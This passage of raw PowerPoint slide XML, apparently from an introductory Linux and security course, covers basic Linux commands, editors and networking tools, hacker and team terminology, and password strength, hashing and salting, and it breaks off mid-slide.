                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Filter out repeated lines in a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Line, word and character count</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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53888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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5447645"/>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Linux File Editors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gedit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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Notepad-like editor with some programming features (e.g., syntax highlighting). Requires X-Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">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nano</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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Lightweight editor. Non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Xwindows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"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emacs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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Swiss-army knife, has modes for all major languages, and can be customized. Formerly steep learning curve has been reduced with introduction of menu and tool bars. Can be used under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Xwindows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">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vim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>proved version of ‘vi’ (an early full-screen editor). Very fast, efficient. Steep learning curve. Popular among systems programmers. Terminal or X-Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22984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938992"/>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Linux Networking Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34855158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Networking Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4093428"/>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ifconfig</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ifconfig utility is used to configure network interface parameters.</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Mostly we use this command to check the IP address assigned to the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>traceroute</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traceroute print the route packets take to network host.</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Destination host or IP is mandatory parameter to use this utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dig</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dig (Domain Information Groper) is a flexible tool for interrogating DNS name servers.</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It performs DNS lookups and displays the answers that are returned from the name servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32307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Networking Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3785652"/>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telnet</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telnet connect destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>host:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> via a telnet protocol if connection establishes means connectivity between two hosts is working fine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a program to query Internet domain name servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>netstat</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netstat command allows you a simple way to review each of your network connections and open sockets.</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netstat with head output is very helpful while performing web server troubleshooting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352571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2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>White Hat – “good guys”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Black Hat – “bad guys”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Red Team - offense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Blue Team - defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67380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Linux Networking Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> allows you to secure copy files to and from another host in the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>w</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w prints a summary of the current activity on the system, including what each user is doing, and their processes.</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Also list the logged in users and system load average for the past 1, 5, and 15 minutes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a one of the powerful commands, which checks the opened port on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>enable/disable interface</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You can enable or disable the network interface by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ifup</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ifdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> commands with ethernet interface parameter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180692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Password Cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1375304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Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4062651"/>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What is a password?</a:t>
            </a:r>
          </a:p>
          <a:p>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 basic security mechanism that consists of a secret pass phrase created using alphabetic, numeric, alphanumeric and symbolic characters, or a combination.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Used to restrict access to a system, application or service to only those users who have memorized or stored and/or are authorized to use it.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May also be called an access code, PIN or secret code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1"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397278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Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4832092"/>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More About Passwords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 password is one of the most used access control procedures applied in virtually all digital and computing appliances.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Generally, a password is used in combination with a user name and in most cases, an individual must provide both to gain access to a system, network or other password-protected area.</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 most applications and services, passwords are created by the user themselves and are typically separate for each different system or service used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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5658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Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5262979"/>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What Makes a Strong Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Has 12 Characters, Minimum: You need to choose a password that’s long enough. There’s no minimum password length everyone agrees on, but you should generally go for passwords that are a minimum of 12 to 14 characters in length.</a:t>
            </a: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A longer password would be even better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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Includes Numbers, Symbols, Capital Letters, and Lower-Case Letters</a:t>
            </a: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Use a mix of different types of characters to make the password harder to crack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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Isn’t a Dictionary Word or Combination of Dictionary Words: Stay away from obvious dictionary words and combinations of dictionary words. Any word on its own is bad. Any combination of a few words, especially if they’re obvious, is also bad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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For example, “house” is a terrible password. “Red house” is also very bad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Doesn’t Rely on Obvious Substitutions: Don’t use common substitutions, either — for example, “H0use” isn’t strong just because you’ve replaced an o with a 0. That’s just obvious.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248459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 Hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1938992"/>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Hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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Hash is both a noun and a verb. Hashing is the act of converting passwords into unreadable strings of characters that are designed to be impossible to convert back, known as hashes. Some hashing schemes are more easily cracked than others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 2" descr="Image result for password hashing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE206697-63E8-4569-8D3C-C0EDA07632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62" t="31550" r="6050" b="17774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2177143" y="3709426"/>
            <a:ext cx="7837714" cy="250746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088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 Hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="4271165"/>
            <a:ext cx="9856839" cy="2308324"/>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As shown above, the blocks are processed one at a time. The output of the first data block is fed as input along with the second data block. Consequently, the output of the second is fed along with the third block and so on. Thus, making the final output the combined value of all the blocks. If you change one bit anywhere in the message, the entire hash value changes. This is called ‘the avalanche effect’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21506" name="Picture 2" descr="the avalanche effect in hashing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE9E318-0D04-4CE9-977B-70BE82E926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69" b="5965"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2631406" y="1245053"/>
            <a:ext cx="6953250" cy="28207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47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 Salting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5262979"/>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Salt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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 salt is a fixed-length cryptographically-strong random value that is added to the input of hash functions to create unique hashes for every input, regardless of the input not being unique. A salt makes a hash function look non-deterministic, which is good as we don't want to reveal password duplications through our hashing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Let’s say that we have password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>farm1990M0O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and the salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>f1nd1ngn3m0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. We can salt that password by either appending or prepending the salt to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>farm1990M0O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>f1nd1ngn3m0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
